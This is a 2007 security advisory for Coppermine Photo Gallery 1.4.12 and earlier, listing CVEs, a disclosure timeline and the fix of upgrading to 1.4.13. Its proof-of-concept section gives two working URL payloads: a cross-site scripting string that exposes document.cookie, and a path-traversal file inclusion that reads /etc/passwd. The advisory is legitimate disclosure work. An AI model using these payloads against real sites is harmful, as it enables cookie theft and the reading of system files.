Coppermine <= 1.4.12 Cross Site Scripting and Local File Inclusion

2007.09.19

Credit: L4teral

Risk: High

Local: No

Remote: Yes

CVE: CVE-2007-4976 | CVE-2007-4977

CWE: CWE-79

============================================================
Coppermine <= 1.4.12 Cross Site Scripting and Local File Inclusion
============================================================
Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting/Local File Inclusion
Status: patch available
------------------------------
Affected software description:
------------------------------
Application: Coppermine Photo Gallery
Version: <= 1.4.12
Vendor: http://coppermine-gallery.net
Description:
Coppermine is a multi-purpose fully-featured and integrated
web picture gallery script written in PHP using GD or ImageMagick
as image library with a MySQL backend.
----------------
Vulnerabilities:
----------------
The script mode.php does not properly sanitize the "referer" parameter.
The script viewlog.php does not properly sanitize the "log" parameter.
------------
Poc/Exploit:
------------
http://localhost/cpg/mode.php?admin_mode=1&referer=javascript:alert(docu
ment.cookie)
http://localhost/cpg/viewlog.php?log=../../../../../../../../../etc/pass
wd%00
(should need admin privileges)
---------
Solution:
---------
update to 1.4.13 or above
---------
Timeline:
---------
03.09.2007 - vendor informed
14.09.2007 - patch released by vendor
17.09.2007 - public disclosure

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Coppermine <= 1.4.12 Cross Site Scripting and Local File Inclusion

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.